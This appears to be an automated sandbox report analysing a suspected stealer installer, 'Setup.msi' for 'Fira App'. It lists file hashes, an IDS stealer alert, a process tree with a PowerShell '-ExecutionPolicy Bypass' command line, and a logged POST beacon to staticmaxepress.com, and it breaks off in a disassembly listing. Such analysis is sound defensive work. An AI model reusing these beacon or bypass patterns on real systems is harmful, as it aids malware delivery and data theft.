SSDEEP:	48:E8Ph4uRc06WXJ8FT5y7niMoAErCyfSZjjXFmSZKTY:bh41fFT4pwCQCXwk
MD5:	95C1023D3FCD4F2567166A5D87BA13B4
SHA1:	BCFFDEAC68674380F3C6350F928AFF62B78983F1
SHA-256:	A0631D14F23F605153026BAAAD9FC50D7877769746B36C07A3050B19FD9F6445
SHA-512:	B96961E54D86621D1C5721840DE1667164FFE1254E27658A2C77AEF4C88C3C6DE3F5C369DBECD31A47598F5121C6C4E3623EAAB6F23D0260BA3359456AB3B82A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD26B78B7C51377E0.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06942346097734044
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKO0DFtDnyVky6l3X:2F0i8n0itFzDHFyB3X
MD5:	A18C5F2F4C4F8FF904B1814213014945
SHA1:	565969E9B730E13ED98CFB5EDC704A3E1F788544
SHA-256:	1D7EC442C0EF4B26FEBDE2D7B5E5313648E0AA3B3EFA5D913C585CFBF784CAC4
SHA-512:	F4224F321128ED03BB675C8A97D9E69B457FBFD848D5E60C48C82D9464EB13A21184E4A3466B079A2081BF91A612A1DB7161230121FDAD0E1FA231B8A8FD93F9
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD2AB6BF2F199F45B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2566202634578798
Encrypted:	false
SSDEEP:	48:lVwuAO+CFXJxT5Es7niMoAErCyfSZjjXFmSZKTY:rwCJTuYpwCQCXwk
MD5:	87FCCC0DA73F0774C8BD2499B9AA5CC7
SHA1:	04D9817B853F689CA5FEB8510E78CBBC9526D9D1
SHA-256:	9364C04B2981811C361BD9352080252B3ACCF2EE67A93A3246CFD1A01949F4B5
SHA-512:	21E24624F6E9738B110DC75FF8F1BD455AE65D3F18062C329EEFA265498876B7B019C3008BADD7E07909D80070C6B203FD4F6362438631EF71A81568BA197345
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE97D02350A1CE9CF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF16017F1CCFF6B94.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF6C3C71DD7B0E2AD.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2566202634578798
Encrypted:	false
SSDEEP:	48:lVwuAO+CFXJxT5Es7niMoAErCyfSZjjXFmSZKTY:rwCJTuYpwCQCXwk
MD5:	87FCCC0DA73F0774C8BD2499B9AA5CC7
SHA1:	04D9817B853F689CA5FEB8510E78CBBC9526D9D1
SHA-256:	9364C04B2981811C361BD9352080252B3ACCF2EE67A93A3246CFD1A01949F4B5
SHA-512:	21E24624F6E9738B110DC75FF8F1BD455AE65D3F18062C329EEFA265498876B7B019C3008BADD7E07909D80070C6B203FD4F6362438631EF71A81568BA197345
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	638
Entropy (8bit):	4.751962275036146
Encrypted:	false
SSDEEP:	12:ku/L92WF4gx9l+jsPczo/CdaD0gwiSrlEX6OPkRVdoaQLeU4wv:ku/h5F4Bs0oCdalwisCkRVKVeU4wv
MD5:	15CA959638E74EEC47E0830B90D0696E
SHA1:	E836936738DCB6C551B6B76054F834CFB8CC53E5
SHA-256:	57F2C730C98D62D6C84B693294F6191FD2BEC7D7563AD9963A96AE87ABEBF9EE
SHA-512:	101390C5D2FA93162804B589376CF1E4A1A3DD4BDF4B6FE26D807AFC3FF80DA26EE3BAEB731D297A482165DE7CA48508D6EAA69A5509168E9CEF20B4A88A49FD
Malicious:	false
Preview:	[createdump] createdump [options] pid..-f, --name - dump path and file name. The default is '%TEMP%\dump.%p.dmp'. These specifiers are substituted with following values:.. %p PID of dumped process... %e The process executable filename... %h Hostname return by gethostname()... %t Time of dump, expressed as seconds since the Epoch, 1970-01-01 00:00:00 +0000 (UTC)...-n, --normal - create minidump...-h, --withheap - create minidump with heap (default)...-t, --triage - create triage minidump...-u, --full - create full core dump...-d, --diag - enable diagnostic messages...-v, --verbose - enable verbose diagnostic messages...

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5086E490-79C3-4148-ABEE-DF320AB927CB}, Number of Words: 10, Subject: Fira App, Author: Hypera Cisia Quero, Name of Creating Application: Fira App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Fira App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sat Jan 11 11:51:38 2025, Last Saved Time/Date: Sat Jan 11 11:51:38 2025, Last Printed: Sat Jan 11 11:51:38 2025, Number of Pages: 450
Entropy (8bit):	7.215706665575828
TrID:	Windows SDK Setup Transform Script (63028/2) 88.73% Generic OLE2 / Multistream Compound File (8008/1) 11.27%
File name:	Setup.msi
File size:	60'684'288 bytes
MD5:	d8056166749f02a5ef16b4457685354e
SHA1:	203328a2a7befb59c07082ca34e50d4bcef19565
SHA256:	842201299a2233f6582895cf0ee30a911c6b502db18426f4cbb43a2db300eda8
SHA512:	fae05da451ce13c309fb88750c81c8a11fa622a9792c742d0023b98ec4d02e80631cfaec725ff024cde98c054df221ca22a98b5c97edf5753dcb4fc1ed63248b
SSDEEP:	786432:TrBQuVmrjV7eIAteQOTZvoh7Daow1PioEoXTaX/IG4l/gcjTVytq9:TrBVmrjV7eIvQOTZvcaoWPnENWgcu
TLSH:	CAD77C01B3FA4148F2F75EB17EBA95A5947ABD521B30C0EF1204A60E1B71BC25BB1763
File Content Preview:	........................>............................................2..................................................................x......................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-12T21:30:24.942056+0100	2829202	ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA	1	192.168.2.5	49704	172.67.162.17	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 21:30:24.395320892 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.395356894 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:24.395416021 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.397713900 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.397730112 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:24.885221958 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:24.885328054 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.938771963 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.938790083 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:24.939188004 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:24.939261913 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.941890001 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.941977024 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:24.942015886 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:25.893724918 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:25.893820047 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:25.893832922 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:25.893892050 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:25.893896103 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:25.893943071 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:25.894573927 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:25.894586086 CET	443	49704	172.67.162.17	192.168.2.5
Jan 12, 2025 21:30:25.894594908 CET	49704	443	192.168.2.5	172.67.162.17
Jan 12, 2025 21:30:25.894624949 CET	49704	443	192.168.2.5	172.67.162.17

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2025 21:30:24.348870993 CET	51684	53	192.168.2.5	1.1.1.1
Jan 12, 2025 21:30:24.388319016 CET	53	51684	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2025 21:30:24.348870993 CET	192.168.2.5	1.1.1.1	0xe0b	Standard query (0)	staticmaxepress.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2025 21:30:24.388319016 CET	1.1.1.1	192.168.2.5	0xe0b	No error (0)	staticmaxepress.com		172.67.162.17	A (IP address)	IN (0x0001)	false
Jan 12, 2025 21:30:24.388319016 CET	1.1.1.1	192.168.2.5	0xe0b	No error (0)	staticmaxepress.com		104.21.34.147	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

staticmaxepress.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.162.17	443	1436	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 20:30:24 UTC	198	OUT	POST /updater2.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: AdvancedInstaller Host: staticmaxepress.com Content-Length: 71 Cache-Control: no-cache
2025-01-12 20:30:24 UTC	71	OUT	Data Raw: 44 61 74 65 3d 31 32 25 32 46 30 31 25 32 46 32 30 32 35 26 54 69 6d 65 3d 31 35 25 33 41 33 30 25 33 41 32 33 26 42 75 69 6c 64 56 65 72 73 69 6f 6e 3d 38 2e 39 2e 39 26 53 6f 72 6f 71 56 69 6e 73 3d 54 72 75 65 Data Ascii: Date=12%2F01%2F2025&Time=15%3A30%3A23&BuildVersion=8.9.9&SoroqVins=True
2025-01-12 20:30:25 UTC	844	IN	HTTP/1.1 500 Internal Server Error Date: Sun, 12 Jan 2025 20:30:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-store cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wv3coqFWxpO%2BMJBF7q143SGRrMc3KtRaX%2FetjCv0LEahYYq%2BKDnkhwmmAM7x1emDN4uCcxFa8QiHZ6FmWmI0FrjOi6mKC%2Fxf%2F9Mm%2BPabqt4ZBaYjHiNt%2F5Z%2BAKWx18KHZLk5q7of"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900fe77e3f7842a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1754&rtt_var=663&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=929&delivery_rate=1645070&cwnd=225&unsent_bytes=0&cid=ad9588c720b5663e&ts=1032&x=0"
2025-01-12 20:30:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:30:12
Start date:	12/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi"
Imagebase:	0x7ff635d10000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:30:12
Start date:	12/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff635d10000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:30:15
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding D44AA04F2F32608A63BB6BADF4D8892C
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:30:26
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Imagebase:	0xd00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:30:26
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:30:33
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\suriqk.bat" "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe""
Imagebase:	0x7ff6f5860000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:30:33
Start date:	12/01/2025
Path:	C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe"
Imagebase:	0x7ff6fd010000
File size:	57'488 bytes
MD5 hash:	71F796B486C7FAF25B9B16233A7CE0CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:30:33
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:30:33
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:30:33
Start date:	12/01/2025
Path:	C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe"
Imagebase:	0x7ff649aa0000
File size:	35'656 bytes
MD5 hash:	D3CAC4D7B35BACAE314F48C374452D71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:30:33
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 07881B45 Relevance: 4.2, Strings: 3, Instructions: 468COMMON

Download Yara Rule

Strings

$]q, xrefs: 07881C3E
$]q, xrefs: 07881BEB
$]q, xrefs: 07881C32

Memory Dump Source

Source File: 00000004.00000002.2234787415.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7880000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: 266cefc3daca21e49a2a96a420ce0738804fca773a76d7528432b6dad5dacb0b
Instruction ID: e2ef8880e1459afc211761d070af1f459d6b72039b688ea44b16de4b61fb08e5
Opcode Fuzzy Hash: 266cefc3daca21e49a2a96a420ce0738804fca773a76d7528432b6dad5dacb0b
Instruction Fuzzy Hash: BE5139B0B0424D9FCB55AF2DD8486AA7BE6EF95320F14846AE805CB252DF34DD42C7A1

Function 04D08BC8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

U, xrefs: 04D08FFD

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: a302170cadd7ebdf8384b3bc46776356fa1432facf0c9b5c6749c5f6e600ca69
Instruction ID: cc18f5ce428c983ee668aac0526a164f4ab52861adf0836c7c0f1ffb841ff615
Opcode Fuzzy Hash: a302170cadd7ebdf8384b3bc46776356fa1432facf0c9b5c6749c5f6e600ca69
Instruction Fuzzy Hash: A871D230A006488FCB14DF68C894A9DBBF6FF85314F18C56AE446DB691DB75EC45CB90

Function 04D036B0 Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e490b8b6b3c8f3ddfe2e8789d2e49951f873a2288b59325ca44653ed2dfd759
Instruction ID: 30bda370c65142f1981d2aef21657d894b4a04f293ff510658680129fedbdff3
Opcode Fuzzy Hash: 3e490b8b6b3c8f3ddfe2e8789d2e49951f873a2288b59325ca44653ed2dfd759
Instruction Fuzzy Hash: 87428F307053418FC715DF28D490BAABBB2FF86304B15859AD886CB7A6DB35F846CB52

Function 04D08478 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2a490c1b1dcd5d076ea6b4b8b448136761b75abed57cd9efeb47e913ee945c
Instruction ID: 293824e53108648811e9c27ad7ea1bd559c6ebdd64faa0c9477c1d0799c31130
Opcode Fuzzy Hash: 3b2a490c1b1dcd5d076ea6b4b8b448136761b75abed57cd9efeb47e913ee945c
Instruction Fuzzy Hash: 21A17E35A002488FDB14EFA5D544AADBBF2FF84340F158519E806AB2A9DB74ED49DB40

Function 04D08D36 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2daf92b13114205f19d5bae6ff6cd4288496b1e7573d0bb6426115e32251940
Instruction ID: 339507892cf8b690b4f734b8dbd0a0490ebbf40b657969bb41c0862580944fb7
Opcode Fuzzy Hash: d2daf92b13114205f19d5bae6ff6cd4288496b1e7573d0bb6426115e32251940
Instruction Fuzzy Hash: 8C713C30E006589FDB14EFA4D484BADBBF2FF85344F248929E406AB291DF75AC46CB51

Function 04D08959 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9521f4ed118a89207d05f2da76c3c0bf70dc1f5ec2739ab3d290e5befc569fff
Instruction ID: c00f290f24da234dbf66941a2cecda34cda214c5c7036199418127be465a10f0
Opcode Fuzzy Hash: 9521f4ed118a89207d05f2da76c3c0bf70dc1f5ec2739ab3d290e5befc569fff
Instruction Fuzzy Hash: F8417C716006008FDB15EB24C858BAD7BB2FF8A754F08856DE506EB3A0CF34AC41DB90

Function 04D08BB3 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c127fcebcd86d17ebaf96207e69161eeb6484c22a8a15734f7bfdccce65deb
Instruction ID: 0f3010c18f97b2fd197e605251c10614b465b5318cd09570bd85e3209a64a403
Opcode Fuzzy Hash: a6c127fcebcd86d17ebaf96207e69161eeb6484c22a8a15734f7bfdccce65deb
Instruction Fuzzy Hash: D5418F70A006588FDB18EFA9C48479DBBF2FF86300F14892DE406AB691DF74AC45CB91

Function 04D03D10 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e134a66b5dc01902d959194a205f7c87759826eac09ab9e2a1dd33f3da7b2be
Instruction ID: 151964ab9a291cc4688134b6343bcab0ac2d57a1aef317ececa2325e14986fe2
Opcode Fuzzy Hash: 4e134a66b5dc01902d959194a205f7c87759826eac09ab9e2a1dd33f3da7b2be
Instruction Fuzzy Hash: B7411874A005059FCB0ACF58C5D4AAEFBB1FF48310B158669D805AB3A5C732FC91CBA0

Function 0486D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223601426.000000000486D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0486D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_486d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b92280fae221b4ba489f39884c58f9bbd06d3bc689cef5dd4767b8dad85149c
Instruction ID: 6b9be4f71ed2e4bfe6386ae08c46843c7e7841c301daa0136af7c3bb5931ecb7
Opcode Fuzzy Hash: 0b92280fae221b4ba489f39884c58f9bbd06d3bc689cef5dd4767b8dad85149c
Instruction Fuzzy Hash: 04012031204344DAD7609E15DD84B57BFDCEF45324F18CA15DD494F246C379A445C6B2

Function 0486D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223601426.000000000486D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0486D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_486d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fb2c497258bf1bb8614ff00a0bcd13fbd168d8394abb56a9566f814552aaed
Instruction ID: d480d923dde84564315beb59061d32024ab5a63b46be72b6edbe84e2365bdd7e
Opcode Fuzzy Hash: 75fb2c497258bf1bb8614ff00a0bcd13fbd168d8394abb56a9566f814552aaed
Instruction Fuzzy Hash: B8019E7110E3C09ED7528B258894B52BFB8EF43224F0DC5CBD9888F2A3C2695849C772

Function 04D088ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2223872907.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747ca4b7e806266d5c8a477d8e3930ba62482fc5961e05cb2669286a7f320239
Instruction ID: 18e26c9f5a27ad55b308f2cf4e5140d3cc43239d69b169b81afa78d314ea006c
Opcode Fuzzy Hash: 747ca4b7e806266d5c8a477d8e3930ba62482fc5961e05cb2669286a7f320239
Instruction Fuzzy Hash: 6CF03030A4020A8FDB08EFA4D595B6E7BB2EF41344F108914D502DF2A8DB78AD4DDBC1

Non-executed Functions

Function 07881658 Relevance: 15.3, Strings: 12, Instructions: 267COMMON

Download Yara Rule

Strings

tP]q, xrefs: 078816D5
Nk, xrefs: 0788173F
84Vk, xrefs: 078817EA
tP]q, xrefs: 07881837
84Vk, xrefs: 078817E0
tP]q, xrefs: 07881843
tP]q, xrefs: 078816E1
$]q, xrefs: 07881690
$]q, xrefs: 0788169C
$]q, xrefs: 0788166A
$]q, xrefs: 078817B4
Nk, xrefs: 0788174D

Memory Dump Source

Source File: 00000004.00000002.2234787415.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7880000_powershell.jbxd

Similarity

API ID:
String ID: 84Vk$84Vk$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q$$]q$Nk$Nk
API String ID: 0-4065697040
Opcode ID: 9966f288262cf474f5e62d66053fcfba45aab31d0b59d5a15c767629388990cc
Instruction ID: da7d2ab3bb66c42a8a42aba0a93145422d1839681a95b529cdcc9d80f4078d41
Opcode Fuzzy Hash: 9966f288262cf474f5e62d66053fcfba45aab31d0b59d5a15c767629388990cc
Instruction Fuzzy Hash: 3F817BB1B043098FD755AF6898546AABBF6EF92310F1884AFD445CB251CE35CC46C7A2

Function 07880898 Relevance: 10.2, Strings: 8, Instructions: 181COMMON

Download Yara Rule

Strings

